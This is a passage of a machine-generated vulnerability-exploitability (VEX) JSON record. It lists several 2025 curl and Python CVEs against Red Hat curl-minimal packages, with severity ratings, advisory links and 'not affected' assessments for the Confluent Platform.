          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14524",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        601
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14524"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg"
        },
        {
          "url": "https://hackerone.com/reports/3459417"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-06-17T08:36:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15079",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        297
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15079"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15079"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q"
        },
        {
          "url": "https://hackerone.com/reports/3477116"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15224",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        287
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15224"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88"
        },
        {
          "url": "https://hackerone.com/reports/3480925"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15282",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15282"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15282"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
